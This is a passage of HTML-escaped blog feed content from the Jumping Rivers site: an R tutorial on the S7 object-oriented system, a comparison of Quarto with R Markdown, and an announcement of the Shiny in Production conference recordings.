&lt;p&gt;Now imagine you could take the best bits of S3 and the best bits of S4. That&amp;rsquo;s where S7 comes in. The S7 package is a new OOP system designed to be a successor to S3 and S4. Unlike S3 and S4 (which were developed for S), S7 is specifically developed for R. S7 is currently being developed by The R Consortium Working Group on OOP. The long-term goal is to merge S7 into base R.&lt;/p&gt;
&lt;p&gt;You can install the development version of S7 from &lt;a href="https://github.com/RConsortium/OOP-WG" rel="external"&gt;GitHub&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;remotes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rconsortium/OOP-WG&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;S7&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="defining-a-class-in-s7"&gt;Defining a class in S7&lt;/h3&gt;
&lt;p&gt;S7 classes are defined formally, and the definition includes a list of properties and an (optional) validator. You can use the (intuitively named) &lt;code&gt;new_class()&lt;/code&gt; function to define a new S7 class. For example, if we want to define a simple S7 class with two properties about breakfast cereals (their &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;year_of_launch&lt;/code&gt;) we can use the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cereal &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;new_class&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cereal&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; properties &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; class_character,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year_of_launch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; class_numeric
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It&amp;rsquo;s not a coincidence that we&amp;rsquo;ve assigned the new class to an object with the same name as the class. It&amp;rsquo;s how we construct new instances of the &lt;code&gt;cereal&lt;/code&gt; class. For example, to construct an instance of the &lt;code&gt;cereal&lt;/code&gt; class, you call &lt;code&gt;cereal()&lt;/code&gt;, and pass in the values of the properties as arguments:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;coco_pops &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cereal&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Coco Pops&amp;#34;&lt;/span&gt;, year_of_launch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1957&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After you&amp;rsquo;ve created an S7 object, you can use &lt;code&gt;@&lt;/code&gt; to access and set properties. For example, Coco Pops were actually released in 1958, so you could update and correct the value using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;coco_pops&lt;span style="color:#ff7b72;font-weight:bold"&gt;@&lt;/span&gt;year_of_launch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1958&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alternatively, using &lt;code&gt;prop(coco_pops, &amp;quot;year_of_launch&amp;quot;) = 1958&lt;/code&gt; does the same thing.&lt;/p&gt;
&lt;p&gt;One of the things I really like about S7 is that the type of the property is automatically validated. When I defined &lt;code&gt;cereal()&lt;/code&gt; earlier, I specified that &lt;code&gt;name&lt;/code&gt; must be a character. If I were to pass in a numeric value when creating a new instance, it would throw an error. You can also pass a &lt;code&gt;validator&lt;/code&gt; argument to &lt;code&gt;new_class()&lt;/code&gt; to provide more complex checks on inputs.&lt;/p&gt;
&lt;p&gt;It will also throw an error if you try to assign a value to a property that hasn&amp;rsquo;t been defined. For example, &lt;code&gt;coco_pops@manufacturer &amp;lt;- &amp;quot;Kellogg&amp;#39;s&amp;quot;&lt;/code&gt; throws an error because &lt;code&gt;manufacturer&lt;/code&gt; isn&amp;rsquo;t in the list of properties defined in &lt;code&gt;cereal()&lt;/code&gt;.&lt;/p&gt;
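&lt;p&gt;Here is a minimal sketch of these checks in action. It redefines &lt;code&gt;cereal&lt;/code&gt; with a &lt;code&gt;validator&lt;/code&gt;; the rule it enforces (exactly one launch year) is an assumption chosen for illustration, not part of the original class. Each failing call is wrapped in &lt;code&gt;try()&lt;/code&gt; so that the script keeps running, and the undefined property is set with &lt;code&gt;prop()&lt;/code&gt;, which behaves like &lt;code&gt;@&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;S7&amp;#34;)

cereal = new_class(name = &amp;#34;cereal&amp;#34;,
  properties = list(
    name = class_character,
    year_of_launch = class_numeric
  ),
  # Illustrative rule: return a message when the object is invalid
  validator = function(self) {
    if (length(self@year_of_launch) != 1) {
      &amp;#34;@year_of_launch must be a single number&amp;#34;
    }
  }
)

# A valid object
coco_pops = cereal(name = &amp;#34;Coco Pops&amp;#34;, year_of_launch = 1958)

# Wrong type: name must be a character
bad_type = try(cereal(name = 123, year_of_launch = 1958), silent = TRUE)

# Fails the custom validator: two launch years
bad_year = try(
  cereal(name = &amp;#34;Coco Pops&amp;#34;, year_of_launch = c(1957, 1958)),
  silent = TRUE
)

# Undefined property: manufacturer is not in the class definition
bad_prop = try({
  prop(coco_pops, &amp;#34;manufacturer&amp;#34;) = &amp;#34;Kellogg&amp;#39;s&amp;#34;
}, silent = TRUE)

# Print the error messages
cat(bad_type, bad_year, bad_prop)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;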
&lt;p&gt;If you want a property to be &lt;em&gt;dynamic&lt;/em&gt;, i.e. computed each time it&amp;rsquo;s accessed, then the &lt;code&gt;new_property()&lt;/code&gt; function is worth exploring. For example, if you wanted to return the current system time every time you called &lt;code&gt;coco_pops@time&lt;/code&gt;, you could use &lt;code&gt;new_property()&lt;/code&gt; in the class definition:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cereal &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;new_class&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cereal&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; properties &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; class_character,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year_of_launch &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; class_numeric,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;new_property&lt;/span&gt;(getter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(self) &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.time&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To me, this already feels a lot more intuitive than some of the other OOP systems in R. For more information on dynamic properties, validation, generics, and methods, see the S7 basics vignette on the &lt;a href="https://rconsortium.github.io/OOP-WG/articles/S7.html" rel="external"&gt;package website&lt;/a&gt;.&lt;/p&gt;
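&lt;p&gt;Coming back to the dynamic &lt;code&gt;time&lt;/code&gt; property, here is a small usage sketch. It repeats the class definition so that it runs on its own; the variable names &lt;code&gt;first&lt;/code&gt; and &lt;code&gt;second&lt;/code&gt; and the short pause are only there for illustration.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;library(S7)

cereal = new_class(name = &amp;#34;cereal&amp;#34;,
  properties = list(
    name = class_character,
    year_of_launch = class_numeric,
    time = new_property(getter = function(self) Sys.time())
  )
)

# The dynamic property is computed, so it is not supplied to the constructor
coco_pops = cereal(name = &amp;#34;Coco Pops&amp;#34;, year_of_launch = 1958)

first = coco_pops@time
Sys.sleep(0.1)
second = coco_pops@time

# The getter runs on every access, so the second value should be later
second &amp;gt; first
&lt;/code&gt;&lt;/pre&gt;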
&lt;h3 id="whats-different-in-s7"&gt;What&amp;rsquo;s Different in S7?&lt;/h3&gt;
&lt;p&gt;Since S7 is designed to be the successor to S3 and S4, you might be wondering two things: (i) how is S7 different from S3, and (ii) how is S7 different from S4?&lt;/p&gt;
&lt;h4 id="s7-vs-s3"&gt;S7 vs S3&lt;/h4&gt;
&lt;p&gt;The good news is that, since S7 is built on top of S3, S7 objects are S3 objects. However, there are a couple of differences between the two:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;S3 objects have a &lt;code&gt;class&lt;/code&gt; attribute. S7 objects also have an &lt;code&gt;S7_class&lt;/code&gt; attribute that contains the object that defines the class.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;S3 objects have &lt;em&gt;attributes&lt;/em&gt;. S7 objects have &lt;em&gt;properties&lt;/em&gt; (which are built on top of attributes). This means that you can still access properties using the &lt;code&gt;attr()&lt;/code&gt; function. However, when working in S7 you generally shouldn&amp;rsquo;t use attributes directly - it just means that your old code will still work.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This means that most S7 code will &lt;em&gt;just work&lt;/em&gt; with S3. You can create S7 methods for S7 classes and S3 generics, and vice versa. You can also use S7 classes to extend S3 classes, and vice versa.&lt;/p&gt;
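&lt;p&gt;A minimal sketch of that interoperability, assuming the simple &lt;code&gt;cereal&lt;/code&gt; class from earlier in the post: it checks the S3 class attribute with &lt;code&gt;inherits()&lt;/code&gt; and then registers a method on &lt;code&gt;format()&lt;/code&gt;, which is an S3 generic from base R. The wording of the formatted string is just an example.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;library(S7)

cereal = new_class(name = &amp;#34;cereal&amp;#34;,
  properties = list(
    name = class_character,
    year_of_launch = class_numeric
  )
)
coco_pops = cereal(name = &amp;#34;Coco Pops&amp;#34;, year_of_launch = 1958)

# S7 objects carry an S3 class attribute, so inherits() works as usual
inherits(coco_pops, &amp;#34;S7_object&amp;#34;)

# Register a method for the cereal class on the S3 generic format()
method(format, cereal) = function(x, ...) {
  paste0(x@name, &amp;#34; (launched &amp;#34;, x@year_of_launch, &amp;#34;)&amp;#34;)
}

format(coco_pops)
&lt;/code&gt;&lt;/pre&gt;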
&lt;h4 id="s7-vs-s4"&gt;S7 vs S4&lt;/h4&gt;
&lt;p&gt;The aforementioned &lt;em&gt;properties&lt;/em&gt; that S7 objects have are essentially equivalent to the &lt;em&gt;slots&lt;/em&gt; that S4 objects have. The main difference between the two is that, in S7 objects, properties can be dynamic. As with S3, you can combine S7 methods with S4 generics, and vice versa. S4 classes can extend S3 classes (which extends to cover S7 classes). However, S7 classes cannot be used to extend S4 classes.&lt;/p&gt;
&lt;h3 id="should-i-switch-to-s7"&gt;Should I switch to S7?&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;re already using S3, switching to S7 should be fairly seamless. You can keep doing everything you&amp;rsquo;re already doing, plus you get some extra functionality for free.&lt;/p&gt;
&lt;p&gt;As I mentioned above, S7 classes cannot be used to extend S4 classes. So if you&amp;rsquo;re an existing S4 user with a large codebase built primarily in S4 that you wish to keep extending, switching to S7 might take a little more work. However, if you&amp;rsquo;re unlikely to want to extend existing S4 classes, the change to S7 should also be relatively smooth. S7 also aims to fix some of the problems with the {methods} package, which implements S4, including performance and complexity issues. That is perhaps another reason to give it a go.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re at the point where you think you might need a bit more control than you can achieve with S3, I&amp;rsquo;d recommend trying S7 before S4. At least from my experience, S7 felt more intuitive and easier to learn than S4.&lt;/p&gt;
&lt;p&gt;Note that since R6 is built on encapsulated objects, rather than generic functions like S3 and S4, it&amp;rsquo;s a very different type of Object Oriented system from S7. So if you&amp;rsquo;re primarily an R6 (or Reference Classes) user, S7 isn&amp;rsquo;t going to be a replacement for your existing approaches.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re excited to see the developments in S7 over the next few months, and we&amp;rsquo;ll soon be updating the material in our &lt;a href="https://www.jumpingrivers.com/training/course/oop-s3-s4-r6-classes/" rel="external"&gt;Object Oriented Programming in R&lt;/a&gt; training course to cover S7!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r7-oop-object-oriented-programming-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>I'm an R user: Quarto or R Markdown?</title><link>https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/</link><pubDate>Thu, 08 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Earlier this year, &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt; (formerly RStudio) released &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt;.
Quarto is an open-source scientific and technical publishing system that allows you to weave together narrative text and code to produce high-quality outputs including reports, presentations, websites, and more.&lt;/p&gt;
&lt;p&gt;One of the main features of Quarto is that it isn&amp;rsquo;t just built for R. It&amp;rsquo;s language-agnostic. It can render documents that contain code written in R, Python, Julia, or Observable. That makes it incredibly useful if you work in multilingual teams, or collaborate with people who write in a different programming language from you. But what if you don&amp;rsquo;t use any other programming languages? What benefits does Quarto bring to people who &lt;em&gt;only&lt;/em&gt; use R?&lt;/p&gt;
&lt;p&gt;In this blog post, we&amp;rsquo;ll highlight some of the features of Quarto that R users might benefit from.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-quarto-rmarkdown-comparison"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="command-line-interface"&gt;Command Line Interface&lt;/h3&gt;
&lt;p&gt;Unlike R Markdown, Quarto isn&amp;rsquo;t an R package.* Quarto is a command line interface. This makes it much easier to work with Quarto documents outside of the RStudio IDE. For example, if you ever need to render a file from a terminal, we think you&amp;rsquo;ll agree that &lt;code&gt;quarto render document.qmd&lt;/code&gt; is a lot more user-friendly than:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rscript -e &lt;span style="color:#a5d6ff"&gt;&amp;#34;rmarkdown::render(&amp;#39;document.Rmd&amp;#39;)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To see the other command line options, run &lt;code&gt;quarto --help&lt;/code&gt; in the terminal.&lt;/p&gt;
&lt;p&gt;* Although Quarto itself isn&amp;rsquo;t an R package, there is a package called {quarto} that provides an R interface to frequently used operations in the command line interface. Installing the {quarto} R package doesn&amp;rsquo;t install Quarto itself; {quarto} is just a thin wrapper around the actual application.&lt;/p&gt;
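&lt;p&gt;For completeness, here is a hedged sketch of rendering the same file from R with the {quarto} package. It assumes that the Quarto command line interface is already installed separately and that a file called &lt;code&gt;document.qmd&lt;/code&gt; exists in the working directory.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Assumes the Quarto CLI is installed and document.qmd exists
library(quarto)

# Locate the Quarto executable that the package will call
quarto_path()

# Equivalent to running `quarto render document.qmd` in a terminal
quarto_render(&amp;#34;document.qmd&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;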
&lt;h3 id="quarto-is-a-single-product"&gt;Quarto is a single product&lt;/h3&gt;
&lt;p&gt;In R Markdown, you might use {distill} to build a website, {bookdown} to write a book, and {revealjs} to make slides. That might mean you&amp;rsquo;re using three different packages to create three different types of content on the same topic. Quarto combines the functionality of R Markdown, bookdown, distill, and other packages into a single system. This can make it easier to create content with multiple output formats. For example, you can use cross-references without installing {bookdown}, and make presentations without installing {revealjs}. Having fewer dependencies makes projects easier to maintain in the longer term - you don&amp;rsquo;t have as many R packages to update!&lt;/p&gt;
&lt;h3 id="combining-content-and-shortcodes"&gt;Combining content (and shortcodes)&lt;/h3&gt;
&lt;p&gt;Quarto allows you to use Hugo style &lt;a href="https://quarto.org/docs/authoring/includes.html#overview" rel="external"&gt;includes&lt;/a&gt;.
This gives a convenient way of reusing content across multiple documents. For example, suppose you have a paragraph or two that provides an introduction to your company. Instead of constantly copying and pasting, the paragraph is stored in a separate document, &lt;code&gt;about.qmd&lt;/code&gt;, and can be included using &lt;code&gt;{{&amp;lt; include about.qmd &amp;gt;}}&lt;/code&gt;. Adding this snippet to your document is equivalent to copying and pasting the text from &lt;code&gt;about.qmd&lt;/code&gt; into the main file. One consequence is that relative links/images are resolved based on the directory of the main document.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;include&lt;/code&gt; is just one example of a Quarto &lt;a href="https://quarto.org/docs/authoring/includes.html#overview" rel="external"&gt;shortcode&lt;/a&gt;. Other useful shortcodes are &lt;code&gt;var&lt;/code&gt; and &lt;code&gt;pagebreak&lt;/code&gt;. The &lt;code&gt;var&lt;/code&gt; shortcode allows you to access values from the &lt;code&gt;_variables.yml&lt;/code&gt; file.
In the past, you might have written a short R function for this task. The &lt;code&gt;pagebreak&lt;/code&gt; shortcode gives a convenient mechanism for adding page breaks in different output formats, e.g. HTML, PDF, or Word.&lt;/p&gt;
&lt;p&gt;You can write your own shortcode and distribute it as an &lt;a href="https://quarto.org/docs/extensions/shortcodes.html#quick-start" rel="external"&gt;extension&lt;/a&gt;. This looks interesting, but so far, relatively few extensions have been created. One reason is that you need to learn Lua to write one.&lt;/p&gt;
&lt;h3 id="extensions"&gt;Extensions&lt;/h3&gt;
&lt;p&gt;Speaking of Quarto extensions&amp;hellip; Shortcodes are just one element that can be shared as a Quarto extension. You can also create custom templates for different types of documents, for example to add corporate branding to a PDF report. Previously, you may have stored these templates as part of an R package. Although you can still share custom Quarto templates as part of an R package, sharing them as a Quarto extension instead means you don&amp;rsquo;t have to build an R package just to share a template. It also means that non-R users can use your template, and that you don&amp;rsquo;t need to use R if you&amp;rsquo;re making a presentation that doesn&amp;rsquo;t include any R code.&lt;/p&gt;
&lt;p&gt;There are a number of templates shared publicly including &lt;a href="https://quarto.org/docs/extensions/listing-journals.html" rel="external"&gt;templates for academic journal formatting&lt;/a&gt;. If you need to change the layout of an article to re-submit it to a different journal, it&amp;rsquo;s as simple as changing &lt;code&gt;jss-pdf&lt;/code&gt; to &lt;code&gt;jasa-pdf&lt;/code&gt;. The &lt;a href="https://github.com/mcanouil/awesome-quarto#templates" rel="external"&gt;Awesome Quarto&lt;/a&gt; GitHub repository has a list of extensions and templates created by the Quarto community.&lt;/p&gt;
&lt;h3 id="quarto-projects"&gt;Quarto Projects&lt;/h3&gt;
&lt;p&gt;Quarto projects are directories that provide a way to render all (or some) of the files in a directory at the same time, for example chapters in a book or pages in a website. A huge benefit of Quarto projects is the existence of the &lt;code&gt;_quarto.yml&lt;/code&gt; file. This file gives you the ability to share YAML metadata options across multiple documents - including format-specific options. You can store metadata that differs depending on whether you render a document as HTML or PDF, in a single place.&lt;/p&gt;
&lt;p&gt;Another file that can be shared across files in your project directory is the &lt;code&gt;_variables.yml&lt;/code&gt; file. This allows you to insert content from the &lt;code&gt;_variables.yml&lt;/code&gt; file into your documents using the &lt;code&gt;var&lt;/code&gt; shortcode. For example, you may include information on your company&amp;rsquo;s email address on different pages of your website.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;email&lt;/span&gt;:&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#7ee787"&gt;info&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;hello@jumpingrivers.com&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can then access this and add it to a page using &lt;code&gt;{{&amp;lt; var email.info &amp;gt;}}&lt;/code&gt;. If your email address changes, you don&amp;rsquo;t need to update it on every page on the website - you just need to update the &lt;code&gt;_variables.yml&lt;/code&gt; file. This feels like a really nice way of sharing information across multiple documents.&lt;/p&gt;
&lt;h3 id="global-code-block-options"&gt;Global code block options&lt;/h3&gt;
&lt;p&gt;When you want to set code chunk options in R Markdown that apply to your whole document, you need to include a setup code chunk at the top of your document.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;```{r}
knitr::opts_chunk$set(echo = FALSE)
```
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In Quarto, rather than writing a separate setup code chunk, you specify your document-wide options in the YAML at the start of the document. When you combine this with the YAML auto-completion feature, it makes it a lot easier to set document-wide options.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;---
title: &amp;#34;A very cool title&amp;#34;
format: html
execute:
  echo: false
---
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;One of the execution options we really like is &lt;code&gt;freeze&lt;/code&gt;. Setting &lt;code&gt;freeze: true&lt;/code&gt; denotes that a document should never be re-rendered during a global project render, and setting &lt;code&gt;freeze: auto&lt;/code&gt; only re-renders a document when its source file has changed. This is really useful if, for example, you write blog posts - you don&amp;rsquo;t necessarily want to re-run and update old blog posts every time you update your website. You can freeze them instead.&lt;/p&gt;
&lt;p&gt;The other code block option we appreciate is the new &lt;code&gt;fenced&lt;/code&gt; option for &lt;code&gt;echo&lt;/code&gt;. The &lt;code&gt;echo&lt;/code&gt; argument determines whether or not the code is shown in your output. When you set &lt;code&gt;echo: fenced&lt;/code&gt; it shows the code block options as well as the code. It&amp;rsquo;s not something we use every day - but it&amp;rsquo;s very useful when you&amp;rsquo;re teaching someone else how to use Quarto!&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s important to remember that R Markdown will continue to be maintained and supported so you don&amp;rsquo;t &lt;em&gt;have&lt;/em&gt; to switch to Quarto. However, if you&amp;rsquo;re an R user considering changing over from R Markdown to Quarto, hopefully this blog post has highlighted some of the features you&amp;rsquo;ll gain from doing so.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/quarto-rmarkdown-comparison/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production: Recordings</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-recordings/</link><pubDate>Tue, 06 Dec 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-recordings/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-recordings/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-recordings/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This week, we&amp;rsquo;ve been reminding ourselves of some of the amazing talks from the Shiny in Production conference in October. The recordings are now up on our &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" rel="external"&gt;YouTube channel&lt;/a&gt;, for anyone to view!&lt;/p&gt;
&lt;p&gt;For a rundown of the day and what you can expect from the videos, take a look at our recent &lt;a href="https://www.jumpingrivers.com/blog/shiny-in-production-highlights/" rel="external"&gt;Highlights blog&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-recordings"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;p&gt;There was even more excitement to be had at the conference, including a joint talk from &lt;a href="https://twitter.com/nic_crane" rel="external"&gt;Nic Crane&lt;/a&gt; and &lt;a href="https://twitter.com/sellorm" rel="external"&gt;Mark Sellors&lt;/a&gt;, and workshops on RStudio (now Posit) Connect, Tableau, and Reporting with Quarto!&lt;/p&gt;
&lt;p&gt;If the recordings really catch your eye, and you want to be there in person next year and get access to everything live, head over to our &lt;a href="https://www.eventbrite.co.uk/e/jumping-rivers-conference-2023-registration-429684055577" rel="external"&gt;Eventbrite page&lt;/a&gt; - Super Early Bird tickets are available now!&lt;/p&gt;
&lt;h3 id="the-playlist"&gt;The playlist&lt;/h3&gt;
&lt;br&gt;
&lt;iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/videoseries?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen&gt;&lt;/iframe&gt;
&lt;img src="robot_shiny.png" alt="JR Robot holding a spanner" style="width: 300px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-recordings/"&gt;original post&lt;/a&gt;
